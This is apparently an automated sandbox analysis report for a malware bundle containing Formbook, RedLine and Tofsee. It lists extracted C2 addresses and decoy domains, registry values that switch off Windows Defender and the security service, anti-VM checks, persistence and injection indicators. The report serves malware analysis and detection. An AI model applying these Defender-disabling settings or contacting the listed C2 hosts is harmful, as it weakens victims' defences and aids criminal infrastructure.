formbook | 3a2e31f2844df5cb91eedbf24c0b93de4b0aa08525f733132c2bce0d7ab81acc

Analysis

max time kernel
172s
max time network
1286s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
20/07/2023, 07:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2022-10-24.zip
Size

973.8MB
MD5

0523322523fc2607b21cf06ee2c06e2f
SHA1

49924c11f7b22dbb1fec51402214a4b62f0c4da0
SHA256

3a2e31f2844df5cb91eedbf24c0b93de4b0aa08525f733132c2bce0d7ab81acc
SHA512

a6ca6c07ece8ad4f4c832cf40bf35e267bfc56f34d0aa252b2cfdcc75ee7fd2b9aa55b547b849820163ca48bd05c9061c76d80756427950d2e5181ebace1ebae
SSDEEP

25165824:cbjDAJklOVFPCJ4jMrhQVzccWZYSXn4yPPGwnSQuw:cbj8Sl66PhncWZYyWw6w

Score

10^/10

formbook redline tofsee dozkey g28p evasion infostealer persistence rat spyware stealer trojan upx

Malware Config

Extracted

Family

redline

Botnet

Dozkey

91.212.166.17:47242

Attributes

auth_value
c06f8f31502cdaf6d673db7589189fd5

Extracted

Family

formbook

Version

4.1

Campaign

g28p

Decoy

whhmgs.asia

wellmedcaredirect.net

beggarded.com

wtpjiv.site

todo-celulares.com

parkitny.net

43345.top

pro-genie.com

cwdxz.com

cbc-inc.xyz

healthspots.net

rulil.top

pyramidaudit.solutions

k8sb15.live

hempaware.report

usclink.life

stayefs.net

05262.top

shop-izakaya-jin.com

iccworldcupnews.com

Extracted

Family

tofsee

svartalfheim.top

jotunheim.name

Signatures

Formbook
Formbook is a data stealing malware which is capable of stealing data.
trojan spyware stealer formbook

Modifies Windows Defender Real-time Protection settings 3 TTPs 14 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	PowerRun.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	PowerRun.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1"	reg.exe

Modifies Windows Defender notification settings 3 TTPs 4 IoCs

evasion trojan

Modify Existing Service

T1031

Modify Registry

T1112

Disabling Security Tools

T1089

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	reg.exe

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	xosefpx.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4"	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 18 IoCs

resource	yara_rule
behavioral1/memory/4052-1609-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1612-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1608-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1617-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1626-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1632-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1636-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1641-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1645-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1649-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1666-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1670-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1660-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1654-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1674-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1678-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1682-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline
behavioral1/memory/4052-1687-0x0000000005300000-0x0000000005344000-memory.dmp	family_redline

Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee

Formbook payload 4 IoCs

rat

resource	yara_rule
behavioral1/memory/1708-1661-0x0000000000400000-0x000000000042F000-memory.dmp	formbook
behavioral1/memory/1708-1697-0x0000000000400000-0x000000000042F000-memory.dmp	formbook
behavioral1/memory/4640-1860-0x0000000000C10000-0x0000000000C3F000-memory.dmp	formbook
behavioral1/memory/4640-2307-0x0000000000C10000-0x0000000000C3F000-memory.dmp	formbook

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	MicrosoftEdgeUpdate.exe

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Modifies Windows Firewall 1 TTPs 2 IoCs

evasion

Modify Existing Service

T1031

pid	Process
4832	netsh.exe
2020	netsh.exe

ACProtect 1.3x - 1.4x DLL software 1 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x0006000000023918-5709.dat	acprotect

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MicrosoftEdgeUpdate.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	MicrosoftEdgeUpdate.exe

Executes dropped EXE 63 IoCs

pid	Process
4052	0bea9e772ca21798cb2eaaf2ad5d05e403b8182756be5f74ac83dd25f2d8dacf.exe
4572	0c1e5acd77d667335c59b10f7bd08997ff5bac4aeb52722fffe17c60d1779553.exe
4024	0be395d43c98fe7b2d0fff10863410665ee11ce31a10277dc03049e77661b1ca.exe
4276	jazvc.exe
1708	jazvc.exe
4920	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe
656	IBInstaller_98220.exe
2620	IBInstaller_98220.tmp
1664	setup.exe
4088	reg.exe
184	cmd.exe
3956	Conhost.exe
4824	SetACL32.exe
1796	SetACL32.exe
3760	SetACL32.exe
3000	reg.exe
4932	reg.exe
2920	reg.exe
5100	sphybwtjm.exe
2020	reg.exe
1828	PowerRun.exe
5020	reg.exe
4600	reg.exe
2752	reg.exe
1788	PowerRun.exe
3600	PowerRun64.exe
436	PowerRun.exe
2244	WerFault.exe
3328	PowerRun.exe
4940	PowerRun.exe
4372	PowerRun.exe
5040	PowerRun.exe
5008	PowerRun.exe
4332	PowerRun.exe
4272	PowerRun64.exe
220	PowerRun.exe
1852	PowerRun.exe
2216	PowerRun.exe
1300	PowerRun.exe
1744	PowerRun.exe
4576	PowerRun64.exe
2208	PowerRun.exe
1540	hkteeaax.exe
2300	PowerRun.exe
4256	PowerRun.exe
1588	1f8079a460be76dad49a59bce35a7620f3372bddc03e73cb8003439c87bf8566.exe
4940	PowerRun.exe
3872	taskmgr.exe
4580	msedge.exe
1780	PowerRun.exe
3356	PowerRun.exe
4000	PowerRun.exe
4048	PowerRun.exe
4496	reg.exe
2828	PowerRun.exe
1116	WerFault.exe
464	3e7caf8f94fd32156a127a2c4fd150003b1e68935e7c8fa1afe46c865145a9b6.exe
3688	MicrosoftEdgeUpdate.exe
3856	PowerRun.exe
772	Process not Found
1800	PowerRun.exe
2528	cmd.exe
2132	Process not Found

Loads dropped DLL 6 IoCs

pid	Process
4920	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe
4920	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe
4920	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe
2620	IBInstaller_98220.tmp
4920	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe
1664	setup.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000023918-5709.dat	upx

Windows security modification 2 TTPs 3 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\DisableAntiVirus = "1"	PowerRun.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	PowerRun.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "4"	PowerRun.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	MicrosoftEdgeUpdate.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
847	ipinfo.io

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
3688	MicrosoftEdgeUpdate.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 4276 set thread context of 1708	4276	jazvc.exe	118
PID 1708 set thread context of 3108	1708	jazvc.exe	41
PID 4640 set thread context of 3108	4640	help.exe	41
PID 5020 set thread context of 4580	5020	reg.exe	570

Launches sc.exe 3 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2572	sc.exe
2800	sc.exe
2096	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 13 IoCs

pid	pid_target	Process	procid_target
4484	4908	WerFault.exe	19
4892	4088	WerFault.exe	128
2244	5100	WerFault.exe	183
4544	4580	WerFault.exe	273
2912	1540	WerFault.exe	262
3604	1412	WerFault.exe	331
1264	5100	WerFault.exe	336
7488	4960	WerFault.exe	808
9252	9504	WerFault.exe	823
5600	3924	WerFault.exe	839
1116	8796	WerFault.exe	874
9656	6696	WerFault.exe	886
8236	2028	Process not Found	1279

NSIS installer 12 IoCs

installer

resource	yara_rule
behavioral1/files/0x000700000002329d-391.dat	nsis_installer_1
behavioral1/files/0x000700000002329d-391.dat	nsis_installer_2
behavioral1/files/0x0007000000023295-1605.dat	nsis_installer_1
behavioral1/files/0x0007000000023295-1605.dat	nsis_installer_2
behavioral1/files/0x0007000000023295-1606.dat	nsis_installer_1
behavioral1/files/0x0007000000023295-1606.dat	nsis_installer_2
behavioral1/files/0x0007000000023501-2798.dat	nsis_installer_1
behavioral1/files/0x0007000000023501-2798.dat	nsis_installer_2
behavioral1/files/0x0007000000023501-2799.dat	nsis_installer_1
behavioral1/files/0x0007000000023501-2799.dat	nsis_installer_2
behavioral1/files/0x0007000000023393-3415.dat	nsis_installer_1
behavioral1/files/0x0007000000023393-3415.dat	nsis_installer_2

Creates scheduled task(s) 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3312	schtasks.exe
6728	schtasks.exe
6264	schtasks.exe
5936	schtasks.exe
6808	schtasks.exe
6360	schtasks.exe
5336	schtasks.exe
5712	schtasks.exe
5220	schtasks.exe
492	schtasks.exe
5220	schtasks.exe
996	schtasks.exe
3008	schtasks.exe
5740	schtasks.exe
4828	schtasks.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
6196	taskkill.exe
8892	taskkill.exe
1224	taskkill.exe
4472	Process not Found

Modifies data under HKEY_USERS 50 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	Process not Found
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	Process not Found
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	WerFault.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	Process not Found
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	WerFault.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	WerFault.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	PowerRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	WerFault.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	PowerRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	Process not Found
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	Process not Found

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1708	jazvc.exe
1708	jazvc.exe
1708	jazvc.exe
1708	jazvc.exe
4640	help.exe
4640	help.exe
4640	help.exe
4640	help.exe
4640	help.exe
4640	help.exe
4640	help.exe
4640	help.exe
4640	help.exe
4640	help.exe
4640	help.exe
4640	help.exe
4640	help.exe
4640	help.exe
2020	reg.exe
2020	reg.exe
2020	reg.exe
2020	reg.exe
1828	PowerRun.exe
1828	PowerRun.exe
4600	reg.exe
4600	reg.exe
1828	PowerRun.exe
1828	PowerRun.exe
4600	reg.exe
4600	reg.exe
1788	PowerRun.exe
1788	PowerRun.exe
3600	PowerRun64.exe
3600	PowerRun64.exe
3600	PowerRun64.exe
3600	PowerRun64.exe
1788	PowerRun.exe
1788	PowerRun.exe
436	PowerRun.exe
436	PowerRun.exe
436	PowerRun.exe
436	PowerRun.exe
3328	PowerRun.exe
3328	PowerRun.exe
3328	PowerRun.exe
3328	PowerRun.exe
5040	PowerRun.exe
5040	PowerRun.exe
5040	PowerRun.exe
5040	PowerRun.exe
4332	PowerRun.exe
4332	PowerRun.exe
4272	PowerRun64.exe
4272	PowerRun64.exe
4272	PowerRun64.exe
4272	PowerRun64.exe
4332	PowerRun.exe
4332	PowerRun.exe
220	PowerRun.exe
220	PowerRun.exe
2216	PowerRun.exe
2216	PowerRun.exe
220	PowerRun.exe
220	PowerRun.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3108	Explorer.EXE

Suspicious behavior: MapViewOfSection 6 IoCs

pid	Process
4276	jazvc.exe
1708	jazvc.exe
1708	jazvc.exe
1708	jazvc.exe
4640	help.exe
4640	help.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	4540	7zG.exe
Token: 35	4540	7zG.exe
Token: SeSecurityPrivilege	4540	7zG.exe
Token: SeSecurityPrivilege	4540	7zG.exe
Token: SeRestorePrivilege	572	7zG.exe
Token: 35	572	7zG.exe
Token: SeSecurityPrivilege	572	7zG.exe
Token: SeSecurityPrivilege	572	7zG.exe
Token: SeDebugPrivilege	4052	0bea9e772ca21798cb2eaaf2ad5d05e403b8182756be5f74ac83dd25f2d8dacf.exe
Token: SeDebugPrivilege	4572	0c1e5acd77d667335c59b10f7bd08997ff5bac4aeb52722fffe17c60d1779553.exe
Token: SeDebugPrivilege	1708	jazvc.exe
Token: SeDebugPrivilege	4640	help.exe
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE
Token: SeShutdownPrivilege	3108	Explorer.EXE
Token: SeCreatePagefilePrivilege	3108	Explorer.EXE

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
4540	7zG.exe
572	7zG.exe
4920	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe

Suspicious use of SetWindowsHookEx 57 IoCs

pid	Process
3108	Explorer.EXE
3108	Explorer.EXE
3108	Explorer.EXE
3108	Explorer.EXE
3108	Explorer.EXE
3108	Explorer.EXE
3108	Explorer.EXE
3108	Explorer.EXE
3108	Explorer.EXE
3108	Explorer.EXE
4920	0f9b1a70b9f5dae682e68e8f0b01f3268013721d4d4fbff9d128268a511f775d.exe
656	IBInstaller_98220.exe
2620	IBInstaller_98220.tmp
1664	setup.exe
184	cmd.exe
3956	Conhost.exe
4824	SetACL32.exe
1796	SetACL32.exe
3760	SetACL32.exe
3000	reg.exe
4932	reg.exe
2920	reg.exe
3108	Explorer.EXE
3108	Explorer.EXE
2020	reg.exe
1828	PowerRun.exe
4600	reg.exe
1788	PowerRun.exe
3600	PowerRun64.exe
3108	Explorer.EXE
3108	Explorer.EXE
436	PowerRun.exe
3328	PowerRun.exe
5040	PowerRun.exe
4332	PowerRun.exe
4272	PowerRun64.exe
220	PowerRun.exe
2216	PowerRun.exe
1744	PowerRun.exe
4576	PowerRun64.exe
2300	PowerRun.exe
4256	PowerRun.exe
3108	Explorer.EXE
3108	Explorer.EXE
3872	taskmgr.exe
1780	PowerRun.exe
3108	Explorer.EXE
3108	Explorer.EXE
4000	PowerRun.exe
4048	PowerRun.exe
4496	reg.exe
1116	WerFault.exe
3856	PowerRun.exe
1800	PowerRun.exe
